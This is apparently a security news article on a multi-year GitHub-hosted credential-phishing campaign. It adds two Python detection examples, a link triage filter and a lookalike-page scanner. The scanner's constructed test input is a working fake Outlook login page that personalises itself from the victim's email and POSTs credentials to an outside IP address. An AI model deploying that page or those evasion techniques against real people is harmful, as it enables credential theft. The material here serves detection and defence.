Operation HookedWing: 4-Year Campaign Compromises 500 Orgs

SOCRadar uncovered Operation HookedWing, a 4-year credential-harvesting campaign that compromised 2,000+ accounts across 500+ organizations in aviation, energy, government, and critical infrastructure using GitHub-hosted phishing pages.

    SOCRadar researchers published analysis of Operation HookedWing, a sustained credential-harvesting phishing campaign running since at least 2022 that has compromised more than 2,000 user credentials across over 500 organizations in aviation, energy, government, critical infrastructure, logistics, and financial services — with attribution unresolved despite four years of continuous operation.

    Operation HookedWing’s GitHub-Hosted Phishing Infrastructure Defeats URL Blocking

    SOCRadar’s investigation identified the campaign’s defining operational characteristic: phishing landing pages hosted on GitHub rather than on attacker-registered domains. GitHub is treated as a trusted platform by virtually every corporate web proxy and email security product, so URL and domain-reputation blocking, the most widely deployed phishing control, cannot stop links to GitHub-hosted content without blocking GitHub entirely. Defending against this means moving the decision from the domain to the specific GitHub surface and the page it serves: a GitHub Pages site on a github.io subdomain renders arbitrary attacker HTML in the browser, which a repository page browsed on github.com does not.
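    The following is an added example (not SOCRadar's code or anything from the campaign) of how a mail gateway can act on that distinction instead of blocking GitHub outright: it sorts links by the GitHub surface they point to and applies a per-surface policy. The policy thresholds, the sender-trust rule and the sample email are assumptions constructed for the example.

```python
"""Triage of GitHub-hosted links in inbound email.

Added example, not SOCRadar's code. Instead of asking "is github.com on the
blocklist?", it asks which GitHub surface a link points to, because the
surfaces differ in what they can serve:
  * <user>.github.io (GitHub Pages) returns arbitrary HTML to the browser,
    so it is the surface that can host a working login lookalike;
  * raw.githubusercontent.com and gist.githubusercontent.com serve files as
    text/plain with X-Content-Type-Options: nosniff, so they cannot render
    a page but can supply the scripts, images and config one loads;
  * github.com repository URLs render inside GitHub's own interface.
The policy below and the sample email are assumptions/constructed.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"')\]]+", re.IGNORECASE)

PAGES = "github-pages"  # attacker-controlled HTML rendered by the browser
RAW = "github-raw"      # text/plain payload host, cannot render a page
REPO = "github-repo"    # ordinary repository browsing
OTHER = "other"


def classify_github_url(url: str) -> str:
    """Map a URL to the GitHub surface it targets, or OTHER."""
    host = (urlparse(url).hostname or "").lower()
    if host == "github.io" or host.endswith(".github.io"):
        return PAGES
    if host in ("raw.githubusercontent.com", "gist.githubusercontent.com"):
        return RAW
    if host == "github.com" or host.endswith(".github.com"):
        return REPO
    return OTHER


def triage_email(body: str, external_sender: bool) -> list:
    """Return (url, surface, action) for each link in an email body.

    Policy (an assumption for this example, not a SOCRadar recommendation):
    Pages links from external senders are held for review or detonation
    instead of being delivered; raw-content links are delivered but logged
    so a later incident can be traced; everything else is delivered.
    Pages links from internal senders pass because engineering teams share
    project sites legitimately.
    """
    results = []
    for url in URL_RE.findall(body):
        surface = classify_github_url(url)
        if surface == PAGES and external_sender:
            action = "hold"
        elif surface == RAW:
            action = "log"
        else:
            action = "deliver"
        results.append((url, surface, action))
    return results


# Constructed sample mirroring the lure style the campaign uses (HR notice).
SAMPLE_EXTERNAL = (
    "From: HR Team <hr-notices@example.org>\n"
    "Subject: Updated leave policy - action required\n\n"
    "Please confirm you have read the policy at "
    "https://acme-login.github.io/outlook/ and see the guide at "
    "https://raw.githubusercontent.com/u/r/main/guide.js for details.\n"
    "Repository for reference: https://github.com/u/r\n"
)

if __name__ == "__main__":
    for url, surface, action in triage_email(SAMPLE_EXTERNAL, external_sender=True):
        print(f"{action:8} {surface:13} {url}")
```

    Two caveats on the host check: GitHub Pages sites can also be served under a custom domain, which this classifier will not recognise, and a github.io link is only suspicious, not conclusive, so the "hold" action should feed a content inspection or detonation step rather than a verdict on its own.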

    The phishing emails impersonate HR personnel, colleagues, or system notification services and direct recipients to landing pages that simulate Microsoft Outlook’s login interface. The fake Outlook page shows a full-screen pre-loader and then personalizes the displayed organization name from the victim’s email domain, so the victim sees what appears to be their own organization’s Outlook sign-in rather than a generic Microsoft page. Because the organization name is the cue most users would check, this domain-aware personalization removes the discrepancy that might otherwise make a victim pause before entering credentials.
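    As an added example (not SOCRadar's code and not the campaign's HTML), the heuristic below reviews a captured landing page for exactly the traits described: Microsoft branding, a password prompt, credentials that can be sent somewhere other than a Microsoft sign-in host, and a script that personalizes the page from an email address found in the URL. The write-up does not say how the victim's email reaches the page; the example assumes the common technique of carrying it in the URL fragment, which is an assumption, and both sample pages are constructed.

```python
"""Heuristic review of a captured login lookalike page.

Added example, not SOCRadar's code. The campaign's page shows a full-screen
pre-loader and fills in the victim's organization name from the victim's
email domain. The write-up does not say how the email reaches the page; this
example assumes the common technique of carrying it in the URL fragment
(https://host/#user@victim.example), which browsers never send to a server,
so it leaves no trace in hosting logs. SAMPLE_PAGE and BENIGN_PAGE are
constructed for this example and are not the campaign's HTML.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosts a genuine Microsoft sign-in form may post to (allowlist, not exhaustive).
MICROSOFT_LOGIN_HOSTS = {
    "login.microsoftonline.com", "login.live.com", "login.microsoft.com",
    "account.live.com", "login.windows.net",
}
BRAND_RE = re.compile(r"\b(outlook|office ?365|microsoft)\b", re.I)
URL_IDENT_RE = re.compile(r"location\.(hash|search)")        # reads victim id from URL
DOMAIN_SPLIT_RE = re.compile(r"split\(\s*['\"]@['\"]\s*\)")  # derives org from domain
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class _Scan(HTMLParser):
    """Collect form actions, password inputs, script bodies and visible text."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.scripts, self.text = [], [], []
        self.password_field = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_field = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)


def analyse_page(html: str, page_url: str) -> dict:
    s = _Scan()
    s.feed(html)
    script = "\n".join(s.scripts)
    # Every destination credentials could reach: form actions resolved against
    # the page URL (a relative action means the hosting site itself) plus any
    # absolute URL a script could POST to.
    targets = [urljoin(page_url, a) for a in s.form_actions] + URL_RE.findall(script)
    hosts = {urlparse(t).hostname or "" for t in targets}
    off_ms = sorted(h for h in hosts if h and h not in MICROSOFT_LOGIN_HOSTS)
    personalises = bool(URL_IDENT_RE.search(script) and DOMAIN_SPLIT_RE.search(script))
    branded = bool(BRAND_RE.search(" ".join(s.text)))
    return {
        "password_field": s.password_field,
        "branded": branded,
        "off_microsoft_targets": off_ms,
        "personalises_from_url": personalises,
        # Core signal: a Microsoft-branded password prompt whose credentials can
        # go anywhere other than a Microsoft sign-in host. URL-driven
        # personalisation is reported separately as a confidence booster.
        "verdict": "lookalike" if (branded and s.password_field and off_ms) else "benign",
    }


# Constructed lookalike: pre-loader, fragment-driven org name, off-site POST.
SAMPLE_PAGE = """<!doctype html><html><head><title>Sign in to Outlook</title></head><body>
<div id="loader" style="position:fixed;top:0;left:0;width:100%;height:100%">Loading...</div>
<h1>Outlook</h1><p id="org">Sign in to your account</p>
<form id="f" action="/collect.php" method="post">
  <input type="email" name="email" id="email"><input type="password" name="password">
</form>
<script>
  var victim = location.hash.replace('#', '');
  if (victim.indexOf('@') > 0) {
    document.getElementById('email').value = victim;
    var org = victim.split('@')[1].split('.')[0];
    document.getElementById('org').textContent = 'Sign in to ' + org.toUpperCase() + ' Outlook';
  }
  setTimeout(function () { document.getElementById('loader').style.display = 'none'; }, 1500);
  document.getElementById('f').onsubmit = function () {
    fetch('https://203.0.113.10/api/log', {method: 'POST', body: new FormData(this)});
  };
</script></body></html>"""

# Constructed benign control: branded password form posting to a Microsoft host.
BENIGN_PAGE = """<html><body><h1>Microsoft</h1>
<form action="https://login.microsoftonline.com/common/login" method="post">
<input type="password" name="passwd"></form></body></html>"""

if __name__ == "__main__":
    print(analyse_page(SAMPLE_PAGE, "https://acme-login.github.io/outlook/"))
    print(analyse_page(BENIGN_PAGE, "https://login.microsoftonline.com/"))
```

    The fragment assumption matters for investigators: if the victim identifier travels in the `#` part of the URL, the hosting provider's logs will show only the bare page path, so the list of targeted users has to be reconstructed from the mail gateway or from the C2 side rather than from GitHub.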

    SOCRadar identified more than two dozen command-and-control servers and over 100 GitHub domains used as phishing infrastructure across the campaign’s four-year run — an infrastructure scale that indicates a well-resourced operation capable of rotating assets faster than blocklist updates can track.

    Operation HookedWing Harvests Credentials, Geolocation, and Org Domain per Victim

    Each successful credential submission delivers a comprehensive data set to the campaign’s operators. Beyond the email address and password, the operation captures the victim’s IP address and geolocation, the referring URL that delivered the phishing link, and the victim’s organization domain. That combination gives the attacker everything needed for organization-specific follow-on targeting: confirmed valid credentials, the victim’s network location, and the organizational context for scoping subsequent intrusion activity. The IP address and geolocation also let the operator choose an egress point near the victim when the credentials are later reused, which blunts sign-in controls built on impossible travel or unfamiliar location.

    SOCRadar noted that the targeting across the campaign’s four years is “not random” but concentrated on organizations of “high geopolitical relevance” — the aviation and travel sector, critical infrastructure operators, energy companies, government agencies, financial services firms, and public administration bodies across multiple continents. The sustained, multi-year targeting of these specific sectors is consistent with intelligence collection priorities rather than financially motivated credential resale.

    Operation HookedWing: Four Years of Aviation and Critical Infrastructure Targeting With No Actor Identified

    Despite documenting Operation HookedWing’s infrastructure, attack chain, and target sectors over a four-year period, SOCRadar’s analysis did not attribute the campaign to a specific known threat actor. The campaign has maintained operational consistency — the same core phishing infrastructure and Outlook simulation technique — while updating C2 servers and GitHub-hosted assets to stay ahead of detection. This combination of operational discipline and long-term persistence is characteristic of well-resourced threat actors operating under sustained intelligence collection mandates.

    Aviation and Energy Targeting Signals Geopolitical Intelligence Collection

    The campaign’s sector focus maps closely to categories of infrastructure that hold operational intelligence value beyond commercial competitive advantage. Aviation organizations hold flight schedules, air traffic management data, and cargo routing information. Energy sector organizations manage grid operations, fuel supply chains, and production data. Government and public administration targets hold policy, personnel, and inter-agency communications.

    The sustained, four-year investment in maintaining a phishing operation of this scale, across 500+ target organizations and 24+ C2 servers, without pivoting to ransomware or publicly visible financial crime suggests that the operation’s value lies in the intelligence collected rather than in monetization of compromised accounts. The absence of attribution leaves open which state or non-state actor has been accumulating credentials across critical infrastructure on multiple continents since 2022. SOCRadar reported its findings to relevant law enforcement and industry partners as part of its disclosure process.
